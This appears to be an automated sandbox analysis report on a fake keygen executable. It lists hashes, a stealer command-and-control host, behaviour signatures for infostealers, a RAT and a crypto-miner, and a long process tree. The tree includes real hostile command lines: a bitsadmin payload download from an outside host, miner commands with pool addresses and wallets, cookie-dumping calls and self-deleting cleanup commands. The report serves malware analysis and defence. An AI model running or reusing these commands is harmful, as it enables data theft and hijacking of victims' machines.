Resubmissions

24-04-2021 20:33

210424-t3nc6v2zm6 10

24-04-2021 20:33

210424-tvfj4vfree 10

Analysis

  • max time kernel
    1801s
  • max time network
    1692s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-04-2021 20:33

General

  • Target

    keygen-step-4 — копия.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 53 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2760
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2752
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2596
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2484
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2416
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1896
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1316
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1268
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1120
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1032
                    • C:\Users\Admin\AppData\Roaming\ficiajh
                      C:\Users\Admin\AppData\Roaming\ficiajh
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5960
                      • C:\Users\Admin\AppData\Roaming\ficiajh
                        C:\Users\Admin\AppData\Roaming\ficiajh
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5384
                    • C:\Users\Admin\AppData\Roaming\rwciajh
                      C:\Users\Admin\AppData\Roaming\rwciajh
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4992
                    • C:\Users\Admin\AppData\Roaming\ficiajh
                      C:\Users\Admin\AppData\Roaming\ficiajh
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5288
                      • C:\Users\Admin\AppData\Roaming\ficiajh
                        C:\Users\Admin\AppData\Roaming\ficiajh
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4196
                    • C:\Users\Admin\AppData\Roaming\rwciajh
                      C:\Users\Admin\AppData\Roaming\rwciajh
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5844
                    • C:\Users\Admin\AppData\Roaming\ficiajh
                      C:\Users\Admin\AppData\Roaming\ficiajh
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4128
                      • C:\Users\Admin\AppData\Roaming\ficiajh
                        C:\Users\Admin\AppData\Roaming\ficiajh
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5332
                    • C:\Users\Admin\AppData\Roaming\rwciajh
                      C:\Users\Admin\AppData\Roaming\rwciajh
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4924
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll",ltJNQrS
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:3176
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:4032
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3704
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1228
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3680
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3464
                        • C:\Users\Admin\AppData\Local\Temp\is-FRP2M.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-FRP2M.tmp\Install.tmp" /SL5="$7004A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1052
                          • C:\Users\Admin\AppData\Local\Temp\is-52E02.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-52E02.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3640
                            • C:\Program Files\Microsoft Office\MUWTMKQTJB\ultramediaburner.exe
                              "C:\Program Files\Microsoft Office\MUWTMKQTJB\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4168
                              • C:\Users\Admin\AppData\Local\Temp\is-88E2E.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-88E2E.tmp\ultramediaburner.tmp" /SL5="$70068,281924,62464,C:\Program Files\Microsoft Office\MUWTMKQTJB\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4232
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4316
                            • C:\Users\Admin\AppData\Local\Temp\3e-e2fe6-e68-ea9a7-68da85a9de46e\Sulylulujo.exe
                              "C:\Users\Admin\AppData\Local\Temp\3e-e2fe6-e68-ea9a7-68da85a9de46e\Sulylulujo.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4268
                            • C:\Users\Admin\AppData\Local\Temp\03-a9577-672-15d89-123a0d00b5fe2\ZHowoqaeqami.exe
                              "C:\Users\Admin\AppData\Local\Temp\03-a9577-672-15d89-123a0d00b5fe2\ZHowoqaeqami.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4360
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sk0e5hlg.ts5\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4996
                                • C:\Users\Admin\AppData\Local\Temp\sk0e5hlg.ts5\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\sk0e5hlg.ts5\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4224
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z2zl253q.dnk\google-game.exe & exit
                                6⤵
                                  PID:1052
                                  • C:\Users\Admin\AppData\Local\Temp\z2zl253q.dnk\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\z2zl253q.dnk\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of SetWindowsHookEx
                                    PID:3668
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      PID:4452
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\of5ssmbk.e3f\md1_1eaf.exe & exit
                                  6⤵
                                    PID:4540
                                    • C:\Users\Admin\AppData\Local\Temp\of5ssmbk.e3f\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\of5ssmbk.e3f\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5560
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fo5xhe0s.uoc\y1.exe & exit
                                    6⤵
                                      PID:5424
                                      • C:\Users\Admin\AppData\Local\Temp\fo5xhe0s.uoc\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\fo5xhe0s.uoc\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:5744
                                        • C:\Users\Admin\AppData\Local\Temp\h8kRJTGd7o.exe
                                          "C:\Users\Admin\AppData\Local\Temp\h8kRJTGd7o.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5852
                                          • C:\Users\Admin\AppData\Roaming\1619303798526.exe
                                            "C:\Users\Admin\AppData\Roaming\1619303798526.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619303798526.txt"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:4932
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\h8kRJTGd7o.exe"
                                            9⤵
                                              PID:5724
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:5592
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\fo5xhe0s.uoc\y1.exe"
                                            8⤵
                                              PID:2136
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:3888
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cvd523ay.f5k\askinstall39.exe & exit
                                          6⤵
                                            PID:5756
                                            • C:\Users\Admin\AppData\Local\Temp\cvd523ay.f5k\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\cvd523ay.f5k\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:6000
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:6088
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:5912
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ncft40u.54t\inst.exe & exit
                                              6⤵
                                                PID:6008
                                                • C:\Users\Admin\AppData\Local\Temp\3ncft40u.54t\inst.exe
                                                  C:\Users\Admin\AppData\Local\Temp\3ncft40u.54t\inst.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:2728
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eswez1o5.eto\SunLabsPlayer.exe /S & exit
                                                6⤵
                                                  PID:5372
                                                  • C:\Users\Admin\AppData\Local\Temp\eswez1o5.eto\SunLabsPlayer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\eswez1o5.eto\SunLabsPlayer.exe /S
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    PID:5368
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5500
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5376
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5800
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5304
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                9⤵
                                                                • Executes dropped EXE
                                                                • Checks processor information in registry
                                                                PID:5300
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:4800
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  9⤵
                                                                    PID:1052
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2976
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Checks for any installed AV software in registry
                                                                    PID:4712
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                    8⤵
                                                                    • Download via BitsAdmin
                                                                    PID:5916
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peb4jzywoorYfqjx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:2308
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pacW6lxxG1IaGlAt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:5480
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4380
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5096
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5052
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4724
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5300
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll" ltJNQrS
                                                                              8⤵
                                                                              • Loads dropped DLL
                                                                              PID:2504
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll" ltJNQrS
                                                                                9⤵
                                                                                • Loads dropped DLL
                                                                                • Drops file in System32 directory
                                                                                PID:5048
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5472
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                • Drops file in Program Files directory
                                                                                PID:5832
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5148
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:1868
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslBB49.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:2184
                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:5892
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gq04adpb.ed0\GcleanerWW.exe /mixone & exit
                                                                                  6⤵
                                                                                    PID:5484
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dtesmrx1.i1w\toolspab1.exe & exit
                                                                                    6⤵
                                                                                      PID:5588
                                                                                      • C:\Users\Admin\AppData\Local\Temp\dtesmrx1.i1w\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\dtesmrx1.i1w\toolspab1.exe
                                                                                        7⤵
                                                                                          PID:4492
                                                                                          • C:\Users\Admin\AppData\Local\Temp\dtesmrx1.i1w\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\dtesmrx1.i1w\toolspab1.exe
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:5232
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n2qwgkvd.21m\c7ae36fa.exe & exit
                                                                                        6⤵
                                                                                          PID:5304
                                                                                          • C:\Users\Admin\AppData\Local\Temp\n2qwgkvd.21m\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\n2qwgkvd.21m\c7ae36fa.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:5876
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qxtx1ipz.41p\app.exe /8-2222 & exit
                                                                                          6⤵
                                                                                            PID:5388
                                                                                            • C:\Users\Admin\AppData\Local\Temp\qxtx1ipz.41p\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\qxtx1ipz.41p\app.exe /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5396
                                                                                              • C:\Users\Admin\AppData\Local\Temp\qxtx1ipz.41p\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\qxtx1ipz.41p\app.exe" /8-2222
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:4328
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4448
                                                                                    • C:\Users\Admin\AppData\Roaming\7D05.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\7D05.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4868
                                                                                      • C:\Users\Admin\AppData\Roaming\7D05.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\7D05.tmp.exe"
                                                                                        4⤵
                                                                                          PID:5300
                                                                                      • C:\Users\Admin\AppData\Roaming\8081.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\8081.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4132
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w28688@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                          4⤵
                                                                                            PID:5092
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w17857 --cpu-max-threads-hint 50 -r 9999
                                                                                            4⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:4508
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          3⤵
                                                                                            PID:4140
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping 127.0.0.1
                                                                                              4⤵
                                                                                              • Runs ping.exe
                                                                                              PID:2296
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          PID:5788
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          PID:3760
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1220
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
